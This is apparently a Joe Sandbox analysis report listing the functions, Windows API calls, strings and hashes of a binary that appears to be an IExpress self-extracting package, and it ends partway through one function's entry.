GetDesktopWindow.USER32 ref: 00007FF6EB14377E
SetWindowTextA.USER32 ref: 00007FF6EB14379F
SendDlgItemMessageA.USER32 ref: 00007FF6EB1437C3
GetDlgItem.USER32 ref: 00007FF6EB1437E0
EnableWindow.USER32 ref: 00007FF6EB1437F1
EndDialog.USER32 ref: 00007FF6EB143804

Strings

probe, xrefs: 00007FF6EB143795
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00007FF6EB143635
, xrefs: 00007FF6EB1436B6

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\$probe
API String ID: 3530494346-2821794307
Opcode ID: db051c84840c0a1ce9bcce3cafedacda87a3346e9426d2c21970a37c6d42e784
Instruction ID: cd72df4f31d54153f9a71e2879939782aa45a40a49bb3550064af234e29120d8
Opcode Fuzzy Hash: db051c84840c0a1ce9bcce3cafedacda87a3346e9426d2c21970a37c6d42e784
Instruction Fuzzy Hash: 63716873A086428AF7608B21B5143F96AA1FB8D7BDF548130CA4D866F5CF3ED507870A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB1412EC Relevance: 16.6, APIs: 11, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EB1411CC: LoadLibraryA.KERNEL32 ref: 00007FF6EB141209
Part of subcall function 00007FF6EB1411CC: GetProcAddress.KERNEL32 ref: 00007FF6EB14122B
Part of subcall function 00007FF6EB1411CC: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF6EB141278
Part of subcall function 00007FF6EB1411CC: FreeSid.ADVAPI32 ref: 00007FF6EB1412A0
Part of subcall function 00007FF6EB1411CC: FreeLibrary.KERNEL32 ref: 00007FF6EB1412AF

GetCurrentProcess.KERNEL32 ref: 00007FF6EB14134D
OpenProcessToken.ADVAPI32 ref: 00007FF6EB141363
GetTokenInformation.ADVAPI32 ref: 00007FF6EB14138C
GetLastError.KERNEL32 ref: 00007FF6EB1413A0
LocalAlloc.KERNEL32 ref: 00007FF6EB1413BA
GetTokenInformation.ADVAPI32 ref: 00007FF6EB1413E8
AllocateAndInitializeSid.ADVAPI32 ref: 00007FF6EB141435
EqualSid.ADVAPI32 ref: 00007FF6EB141460
FreeSid.ADVAPI32 ref: 00007FF6EB141485
LocalFree.KERNEL32 ref: 00007FF6EB141494
CloseHandle.KERNEL32 ref: 00007FF6EB1414A4

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
Instruction ID: 92db3840f999aac3e288efd2e3bb808d04c53fee2e02a871b30f2b08a73a5d38
Opcode Fuzzy Hash: 6813b6756910e0ae34933596af1690bcf55f2b4d44473aa3a3cec1d83aee30ca
Instruction Fuzzy Hash: C2514C33604A81CEE7208F21E4802E97BA4FB8DBACF455135DA0E93764DF3AD555CB05

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB141C0C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6EB142D7F), ref: 00007FF6EB141C21
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF6EB142D7F), ref: 00007FF6EB141C3A
LookupPrivilegeValueA.ADVAPI32 ref: 00007FF6EB141C7B
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF6EB141CB2
CloseHandle.KERNEL32 ref: 00007FF6EB141CC5
ExitWindowsEx.USER32 ref: 00007FF6EB141CF1

Strings

SeShutdownPrivilege, xrefs: 00007FF6EB141C74

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 2829607268-3733053543
Opcode ID: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
Instruction ID: a6c419adf6fd6149da15348039fedff3e8f16692da4d3fc217dc55efe85fac64
Opcode Fuzzy Hash: 4521cc09d256cc9c0a3583f069d9fa5dc9083d0cfa193007e767185542f0c5c5
Instruction Fuzzy Hash: DE218173A18642C7F7208B20E4557BABA60FB8E76DF409135D64E86A64CF3DD046CB09

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB148964 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF6EB148994
GetCurrentProcessId.KERNEL32 ref: 00007FF6EB1489A2
GetCurrentThreadId.KERNEL32 ref: 00007FF6EB1489AE
GetTickCount.KERNEL32 ref: 00007FF6EB1489BA
GetTickCount.KERNEL32 ref: 00007FF6EB1489CA
QueryPerformanceCounter.KERNEL32 ref: 00007FF6EB1489E5

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 4104442557-0
Opcode ID: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
Instruction ID: 6b78c9c4331b4a86c7a616e431ed281da6bb4f26a3bb4d21262989471e53dcac
Opcode Fuzzy Hash: b417f0ca43b0f1a675a55b1394a59fc23cd165e7830d58b26484a22ad4f1a579
Instruction Fuzzy Hash: 99112C36A04B418AEB10DF61E8442A833A4FB4D7ACF440E34EA6D87B64DF7DD5A58345

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB1470A8 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON

Download Yara Rule

APIs

CharNextA.USER32 ref: 00007FF6EB147120
GetModuleFileNameA.KERNEL32 ref: 00007FF6EB1471FB
CharUpperA.USER32 ref: 00007FF6EB14723E
CharUpperA.USER32 ref: 00007FF6EB1472D4
CompareStringA.KERNEL32 ref: 00007FF6EB147368
CharUpperA.USER32 ref: 00007FF6EB1473A3
CharUpperA.USER32 ref: 00007FF6EB1473FF
CharUpperA.USER32 ref: 00007FF6EB147498
CloseHandle.KERNEL32 ref: 00007FF6EB14769E
ExitProcess.KERNEL32 ref: 00007FF6EB1476AC

Strings

@, xrefs: 00007FF6EB14767E
", xrefs: 00007FF6EB147187
:, xrefs: 00007FF6EB147443
RegServer, xrefs: 00007FF6EB147359

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$:$@$RegServer
API String ID: 1203814774-4077547207
Opcode ID: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
Instruction ID: 4968f1a178fca0578c72e2402867b195ac5933352784d6b45e7f6c8d00741586
Opcode Fuzzy Hash: 6e530289b7fe5922f9cfda438616e34a1a36475502b4d42f4ffce2e3ac89d0b1
Instruction Fuzzy Hash: 7C02E463E0C78285FA608B2454147F96BA1AF4E7BCF580531DB5D866B4CE2FE803C74A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB143910 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 119threadwindowCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 00007FF6EB143964
ResetEvent.KERNEL32 ref: 00007FF6EB14398C
SetEvent.KERNEL32 ref: 00007FF6EB1439D3
GetDesktopWindow.USER32 ref: 00007FF6EB143A18
GetDlgItem.USER32 ref: 00007FF6EB143A42
SendMessageA.USER32 ref: 00007FF6EB143A5F
GetDlgItem.USER32 ref: 00007FF6EB143A70
SendMessageA.USER32 ref: 00007FF6EB143A8F
SetWindowTextA.USER32 ref: 00007FF6EB143AA5
CreateThread.KERNEL32 ref: 00007FF6EB143AD0
EndDialog.USER32 ref: 00007FF6EB143B1A

Strings

probe, xrefs: 00007FF6EB143A9B
, xrefs: 00007FF6EB1439B6

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
String ID: $probe
API String ID: 2654313074-3750771189
Opcode ID: d29d643aeea416fab1e010946dc15223199e691555f5366313ee3528c2360453
Instruction ID: 58fd84f63514e7aac2cf1840f9662c14c2d4ed66be846f9af899ef5b6fd69bf5
Opcode Fuzzy Hash: d29d643aeea416fab1e010946dc15223199e691555f5366313ee3528c2360453
Instruction Fuzzy Hash: 30513133A0864286EB208B11F9443F96A61FB8DBBDF549231D91D877B4CF7E9446C70A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB144A60 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 123libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EB1435E3), ref: 00007FF6EB144A86
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EB1435E3), ref: 00007FF6EB144AAA
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EB1435E3), ref: 00007FF6EB144ACA
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EB1435E3), ref: 00007FF6EB144AEC
GetTempPathA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EB1435E3), ref: 00007FF6EB144B1B
CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EB1435E3), ref: 00007FF6EB144B3A
CharPrevA.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EB1435E3), ref: 00007FF6EB144B54
FreeLibrary.KERNEL32 ref: 00007FF6EB144BF1
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EB1435E3), ref: 00007FF6EB144C0D

Strings

SHGetPathFromIDList, xrefs: 00007FF6EB144AE2
SHELL32.DLL, xrefs: 00007FF6EB144A7F
SHBrowseForFolder, xrefs: 00007FF6EB144AA0

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
Instruction ID: 92424831eaaee10a91bb338c8619687f0f31adb0203fdb2843f8ba528d10ddd8
Opcode Fuzzy Hash: 2a5ea4b490894db445cb84de2448d12f1af4c9272f9454c89187ac1fef39355e
Instruction Fuzzy Hash: DF517136A09B428AE7108B11B8106BA7B91FB8EBADF544134DD4E83774DF7ED446C709

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB144DCC Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 159memorywindowCOMMON

Download Yara Rule

APIs

LoadStringA.USER32 ref: 00007FF6EB144E60
LocalAlloc.KERNEL32 ref: 00007FF6EB144F61
LocalAlloc.KERNEL32 ref: 00007FF6EB144F99
MessageBoxA.USER32 ref: 00007FF6EB144EA0

Part of subcall function 00007FF6EB147E34: EnumResourceLanguagesA.KERNEL32 ref: 00007FF6EB147E8C
Part of subcall function 00007FF6EB147E34: EnumResourceLanguagesA.KERNEL32 ref: 00007FF6EB147ECA

LocalAlloc.KERNEL32 ref: 00007FF6EB144EFC
MessageBeep.USER32 ref: 00007FF6EB144FC2
MessageBoxA.USER32 ref: 00007FF6EB145007
LocalFree.KERNEL32 ref: 00007FF6EB145018

Part of subcall function 00007FF6EB147F04: GetVersionExA.KERNEL32 ref: 00007FF6EB147F59
Part of subcall function 00007FF6EB147F04: GetSystemMetrics.USER32 ref: 00007FF6EB147F93
Part of subcall function 00007FF6EB147F04: RegOpenKeyExA.ADVAPI32 ref: 00007FF6EB147FC8
Part of subcall function 00007FF6EB147F04: RegQueryValueExA.ADVAPI32 ref: 00007FF6EB148003
Part of subcall function 00007FF6EB147F04: RegCloseKey.ADVAPI32 ref: 00007FF6EB148016
Part of subcall function 00007FF6EB147F04: CharNextA.USER32 ref: 00007FF6EB148065

Strings

probe, xrefs: 00007FF6EB144E91, 00007FF6EB144FF3
rce., xrefs: 00007FF6EB144DF7

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
String ID: probe$rce.
API String ID: 2929476258-4260851976
Opcode ID: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
Instruction ID: 752cd0f9edb3e695c2c240f641a28067193cd74272602a0cad16a349a1f125ae
Opcode Fuzzy Hash: abe435584ecd5f6fe87ce2b456f1e06dda66ab3f9fb72e6f330788004a039cce
Instruction Fuzzy Hash: 35618D62E087C18AFB218B65A5003F96A90AB5DBBCF045230DE4D977B5DF3DE9838705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB14261C Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 129registryCOMMON

Download Yara Rule

APIs

CharUpperA.USER32 ref: 00007FF6EB142662
CharNextA.USER32 ref: 00007FF6EB142674
CharNextA.USER32 ref: 00007FF6EB142683
RegOpenKeyExA.ADVAPI32 ref: 00007FF6EB142724
RegQueryValueExA.ADVAPI32 ref: 00007FF6EB14275B
ExpandEnvironmentStringsA.KERNEL32 ref: 00007FF6EB142782
RegCloseKey.ADVAPI32 ref: 00007FF6EB1427B9
GetWindowsDirectoryA.KERNEL32 ref: 00007FF6EB1427CF
GetSystemDirectoryA.KERNEL32 ref: 00007FF6EB1427E5

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00007FF6EB1426A6

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 2659952014-2428544900
Opcode ID: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
Instruction ID: e440924cd94f951ea5ca357506976c4ff263ab82e864add84b3a803f6f0b64b1
Opcode Fuzzy Hash: 3b652cf53a0166bf7c173558fb1758d4a4d77de799b7ad200d32d7da73422a7a
Instruction Fuzzy Hash: 3F518F7361868186EA108B11E8543FE7BA0FB8EBADF545031DA4E83B64CF3DD446CB05

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB1433F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6EB143430
GetDesktopWindow.USER32 ref: 00007FF6EB143441
SetDlgItemTextA.USER32 ref: 00007FF6EB143467
SetWindowTextA.USER32 ref: 00007FF6EB14347D
SetForegroundWindow.USER32 ref: 00007FF6EB14348C
GetDlgItem.USER32 ref: 00007FF6EB1434A0
GetWindowLongPtrA.USER32 ref: 00007FF6EB1434B7
SetWindowLongPtrA.USER32 ref: 00007FF6EB1434D9
SendDlgItemMessageA.USER32 ref: 00007FF6EB14350A

Strings

probe, xrefs: 00007FF6EB143473

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID: probe
API String ID: 3785188418-3613290282
Opcode ID: 0c8ccea153f4ee7b78298008ed30abde24da0bd623f78e8aeba97b039f8dc211
Instruction ID: 59de1a7e196de101801c2538fb090dc050a6f12e38dcde3b42c42b62234f3aa9
Opcode Fuzzy Hash: 0c8ccea153f4ee7b78298008ed30abde24da0bd623f78e8aeba97b039f8dc211
Instruction Fuzzy Hash: D33144729086428AE6205B20F9043F46B51FB8EB7DF589630C91E863B4DF3EA446C606

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB147F04 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109registryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF6EB147F59
GetSystemMetrics.USER32 ref: 00007FF6EB147F93
RegOpenKeyExA.ADVAPI32 ref: 00007FF6EB147FC8
RegQueryValueExA.ADVAPI32 ref: 00007FF6EB148003
RegCloseKey.ADVAPI32 ref: 00007FF6EB148016
CharNextA.USER32 ref: 00007FF6EB148065

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00007FF6EB147FBA

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
Instruction ID: 78dfb942124940eeebf0f6e12e758f13191878c25a10e810063f992148be5916
Opcode Fuzzy Hash: 3b2a06a11d2becce3ce338110b622480474f8ae87116164a32f9474e2bd7df5d
Instruction Fuzzy Hash: 3B519133A19A418AE7218B24E4402F977A1FB8DBACF454131DA5D837A4DF3EE546CB06

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB1411CC Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF6EB141209
GetProcAddress.KERNEL32 ref: 00007FF6EB14122B
AllocateAndInitializeSid.ADVAPI32 ref: 00007FF6EB141278
FreeSid.ADVAPI32 ref: 00007FF6EB1412A0
FreeLibrary.KERNEL32 ref: 00007FF6EB1412AF

Strings

CheckTokenMembership, xrefs: 00007FF6EB141221
advapi32.dll, xrefs: 00007FF6EB1411FC

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
Instruction ID: f1188105cb8cd349687b953c5a219a8afb10df564a71cc9919d195c5815b1053
Opcode Fuzzy Hash: aca234308d6c2b9a7267944faa7f1f83278d608330c87f71542cc3174e944061
Instruction Fuzzy Hash: F2313E77608B458AD6108F16F4446A9BBA0FB8DBA8F455139EE4D83724DF3DE006CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB142834 Relevance: 12.2, APIs: 8, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32 ref: 00007FF6EB142A44

Part of subcall function 00007FF6EB14261C: CharUpperA.USER32 ref: 00007FF6EB142662
Part of subcall function 00007FF6EB14261C: CharNextA.USER32 ref: 00007FF6EB142674
Part of subcall function 00007FF6EB14261C: CharNextA.USER32 ref: 00007FF6EB142683
Part of subcall function 00007FF6EB14261C: RegOpenKeyExA.ADVAPI32 ref: 00007FF6EB142724
Part of subcall function 00007FF6EB14261C: RegQueryValueExA.ADVAPI32 ref: 00007FF6EB14275B
Part of subcall function 00007FF6EB14261C: ExpandEnvironmentStringsA.KERNEL32 ref: 00007FF6EB142782
Part of subcall function 00007FF6EB14261C: RegCloseKey.ADVAPI32 ref: 00007FF6EB1427B9

GetFileVersionInfoSizeA.VERSION ref: 00007FF6EB1428AC
GlobalAlloc.KERNEL32 ref: 00007FF6EB1428C9
GlobalLock.KERNEL32 ref: 00007FF6EB1428E4
GetFileVersionInfoA.VERSION ref: 00007FF6EB14290C
VerQueryValueA.VERSION ref: 00007FF6EB142932
GlobalUnlock.KERNEL32 ref: 00007FF6EB1429DC
GlobalUnlock.KERNEL32 ref: 00007FF6EB1429F0

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

API ID: Global$Char$FileInfoNextQueryUnlockValueVersion$AllocCloseEnvironmentExpandFreeLockOpenSizeStringsUpper
String ID:
API String ID: 1051330783-0
Opcode ID: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
Instruction ID: 94de758e733a09831c82788f01f0506d185d7f1ac6ea96c51d2a1438e2cce2cd
Opcode Fuzzy Hash: 6d4c51d06f972b13cb99adb0e904218bc9eace2558dcc6cb5054029ba0357b51
Instruction Fuzzy Hash: 2A515F33A146568AEA208F15D4007FC77A4FB4DBACF545131DE0DA37A4DE3AE486C78A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB142A6C Relevance: 12.1, APIs: 8, Instructions: 126COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF6EB142AB2
IsDBCSLeadByte.KERNEL32 ref: 00007FF6EB142ACE
CharNextA.USER32 ref: 00007FF6EB142AF4
CharUpperA.USER32 ref: 00007FF6EB142B07
CharPrevA.USER32 ref: 00007FF6EB142B43
CharUpperA.USER32 ref: 00007FF6EB142B9F
CharNextA.USER32 ref: 00007FF6EB142BF9
CharNextA.USER32 ref: 00007FF6EB142C0B

Memory Dump Source

Source File: 00000000.00000002.309137074.00007FF6EB141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EB140000, based on PE: true

Associated: 00000000.00000002.309130162.00007FF6EB140000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309147340.00007FF6EB149000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309153624.00007FF6EB14C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.309159971.00007FF6EB14E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6eb140000_08.jbxd

Similarity

